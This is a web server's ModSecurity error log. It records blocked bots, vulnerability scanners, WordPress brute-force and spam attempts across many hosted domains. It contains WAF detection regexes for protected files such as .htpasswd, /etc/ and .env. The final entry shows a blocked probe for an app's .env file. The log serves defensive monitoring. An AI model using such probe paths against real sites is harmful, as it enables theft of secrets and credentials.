[Tue May 26 12:48:47.069402 2026] [security2:error] [pid 448967:tid 449118] [client 185.191.171.12:38976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVJV-XLPuWQsfM-UVStLwAAABU"]
[Tue May 26 12:48:47.069609 2026] [security2:error] [pid 448967:tid 449118] [client 185.191.171.12:38976] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVJV-XLPuWQsfM-UVStLwAAABU"]
[Tue May 26 12:48:47.920068 2026] [security2:error] [pid 448967:tid 449218] [client 4.201.75.230:5354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wefile.php"] [unique_id "ahVJV-XLPuWQsfM-UVStQgAAAHk"]
[Tue May 26 12:48:48.389475 2026] [security2:error] [pid 448967:tid 449153] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJV-XLPuWQsfM-UVStSwAAADg"]
[Tue May 26 12:48:48.896269 2026] [security2:error] [pid 448967:tid 449121] [client 4.201.75.230:40320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/php2.php"] [unique_id "ahVJWOXLPuWQsfM-UVStWwAAABg"]
[Tue May 26 12:48:49.986781 2026] [security2:error] [pid 448967:tid 449178] [client 4.201.75.230:5660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmlss.php"] [unique_id "ahVJWeXLPuWQsfM-UVStfgAAAFE"]
[Tue May 26 12:48:50.559727 2026] [security2:error] [pid 448967:tid 449218] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJWuXLPuWQsfM-UVStgQAAAHk"]
[Tue May 26 12:48:51.251376 2026] [security2:error] [pid 448967:tid 449155] [client 95.142.47.113:53145] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "95.142.47.113" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJW-XLPuWQsfM-UVStoAAAADo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:51.251460 2026] [security2:error] [pid 448967:tid 449155] [client 95.142.47.113:53145] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJW-XLPuWQsfM-UVStoAAAADo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:51.355559 2026] [security2:error] [pid 448967:tid 449217] [client 4.201.75.230:5350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/casp3.php"] [unique_id "ahVJW-XLPuWQsfM-UVStpAAAAHg"]
[Tue May 26 12:48:52.183479 2026] [security2:error] [pid 448967:tid 449118] [client 157.20.138.61:65129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJXOXLPuWQsfM-UVStwAAAABU"]
[Tue May 26 12:48:52.183573 2026] [security2:error] [pid 448967:tid 449118] [client 157.20.138.61:65129] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJXOXLPuWQsfM-UVStwAAAABU"]
[Tue May 26 12:48:53.449757 2026] [security2:error] [pid 448967:tid 449142] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJXOXLPuWQsfM-UVSt1gAAAC0"]
[Tue May 26 12:48:56.698372 2026] [security2:error] [pid 448967:tid 449188] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJYOXLPuWQsfM-UVSuPQAAAFs"]
[Tue May 26 12:48:57.384154 2026] [security2:error] [pid 448967:tid 449107] [client 202.28.194.139:41787] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuVwAAAAo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:57.384279 2026] [security2:error] [pid 448967:tid 449107] [client 202.28.194.139:41787] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuVwAAAAo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 12:48:58.048853 2026] [security2:error] [pid 448967:tid 449025] [remote 103.11.102.106:59436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVJYeXLPuWQsfM-UVSuaAAARDk"]
[Tue May 26 12:48:59.046713 2026] [security2:error] [pid 448967:tid 449167] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJYuXLPuWQsfM-UVSuegAAAEY"]
[Tue May 26 12:49:01.083945 2026] [security2:error] [pid 448967:tid 449125] [client 114.119.152.231:57329] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/trailer/"] [unique_id "ahVJZeXLPuWQsfM-UVSutAAAABw"], referer: https://preetishah.com/episodes/trailer/
[Tue May 26 12:49:01.819204 2026] [security2:error] [pid 448967:tid 449221] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJZeXLPuWQsfM-UVSuvQAAAHw"]
[Tue May 26 12:49:02.723047 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:65482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJZuXLPuWQsfM-UVSu3QAAAHE"]
[Tue May 26 12:49:02.723185 2026] [security2:error] [pid 448967:tid 449210] [client 157.20.138.61:65482] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJZuXLPuWQsfM-UVSu3QAAAHE"]
[Tue May 26 12:49:03.744044 2026] [security2:error] [pid 448967:tid 449208] [client 120.240.178.202:54382] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ((?:submit(?:\\\\+| )?(request)?(?:\\\\+| )?>+|<<(?:\\\\+| )remove|(?:sign ?in|log ?(?:in|out)|next|modifier|envoyer|add|continue|weiter|account|results|select)(?:\\\\+| )?>+)$|^< ?\\\\??(?: |\\\\+)?xml|^<samlp|^>> ?$)" against "ARGS:c" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1093"] [id "350147"] [rev "155"] [msg "Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected"] [severity "CRITICAL"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahVJZ-XLPuWQsfM-UVSu9AAAAG8"]
[Tue May 26 12:49:04.611186 2026] [security2:error] [pid 448967:tid 449141] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJaOXLPuWQsfM-UVSvCgAAACw"]
[Tue May 26 12:49:04.984592 2026] [security2:error] [pid 448967:tid 449199] [client 34.91.36.231:49152] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^/llms.txt" against "REQUEST_URI" required. [file "/opt/mod_security/hg_rules.conf"] [line "588"] [id "999814"] [msg "Misbehaving AI Crawler"] [hostname "cpanel.consultrgb.com"] [uri "/"] [unique_id "ahVJaOXLPuWQsfM-UVSvHgAAAGY"]
[Tue May 26 12:49:04.984728 2026] [security2:error] [pid 448967:tid 449199] [client 34.91.36.231:49152] ModSecurity: Warning. Matched phrase "Scrapy" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cpanel.consultrgb.com"] [uri "/"] [unique_id "ahVJaOXLPuWQsfM-UVSvHgAAAGY"]
[Tue May 26 12:49:08.013471 2026] [security2:error] [pid 448967:tid 449166] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJa-XLPuWQsfM-UVSvZgAAAEU"]
[Tue May 26 12:49:10.293906 2026] [security2:error] [pid 448967:tid 449143] [client 113.190.68.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJbeXLPuWQsfM-UVSvmQAAAC4"]
[Tue May 26 12:49:10.455722 2026] [security2:error] [pid 448967:tid 449129] [client 20.196.127.68:2676] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "cpanel.contabilidadecarioca.com.br"] [uri "/1.php"] [unique_id "ahVJbuXLPuWQsfM-UVSvrQAAACA"]
[Tue May 26 12:49:10.953053 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJbuXLPuWQsfM-UVSvsAAAAAM"]
[Tue May 26 12:49:11.668391 2026] [security2:error] [pid 448967:tid 449134] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJb-XLPuWQsfM-UVSv2AAAACU"], referer: https://www.anujtradingco.com/
[Tue May 26 12:49:13.191497 2026] [security2:error] [pid 448967:tid 449208] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHAAAAG8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1244943&moderation-hash=9638e1b26cf6f7ba1053a7d653c10288
[Tue May 26 12:49:13.541768 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.542015 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.596662 2026] [security2:error] [pid 448967:tid 449187] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHwAAAFo"]
[Tue May 26 12:49:13.886198 2026] [security2:error] [pid 448967:tid 449085] [remote 74.7.241.58:52602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJceXLPuWQsfM-UVSwOQAAQnU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:49:15.251736 2026] [security2:error] [pid 448967:tid 449121] [client 110.249.201.194:59964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJc-XLPuWQsfM-UVSw0AAAABg"]
[Tue May 26 12:49:16.600061 2026] [security2:error] [pid 448967:tid 449130] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJdOXLPuWQsfM-UVSw8QAAACE"]
[Tue May 26 12:49:19.334390 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJduXLPuWQsfM-UVSxQQAAAAM"]
[Tue May 26 12:49:22.550360 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJeuXLPuWQsfM-UVSxrQAAABo"]
[Tue May 26 12:49:24.379540 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.379730 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.901310 2026] [security2:error] [pid 448967:tid 449124] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEwAAABs"]
[Tue May 26 12:49:27.845101 2026] [security2:error] [pid 448967:tid 449209] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJf-XLPuWQsfM-UVSycwAAAHA"]
[Tue May 26 12:49:30.523905 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJguXLPuWQsfM-UVSy6gAAADM"]
[Tue May 26 12:49:33.340271 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJhOXLPuWQsfM-UVSzNAAAAB8"]
[Tue May 26 12:49:35.061895 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.062032 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.689316 2026] [security2:error] [pid 448967:tid 449168] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzdwAAAEc"]
[Tue May 26 12:49:36.354842 2026] [security2:error] [pid 448967:tid 449179] [client 89.117.59.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzkAAAAFI"]
[Tue May 26 12:49:36.989069 2026] [security2:error] [pid 448967:tid 449194] [client 74.249.173.207:40709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVJiOXLPuWQsfM-UVSztAAAAGE"]
[Tue May 26 12:49:38.663892 2026] [security2:error] [pid 448967:tid 449018] [remote 49.125.215.83:61338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVJieXLPuWQsfM-UVSzvQAANDI"]
[Tue May 26 12:49:39.349854 2026] [security2:error] [pid 448967:tid 449168] [client 208.84.100.229:19026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LwAAAEc"]
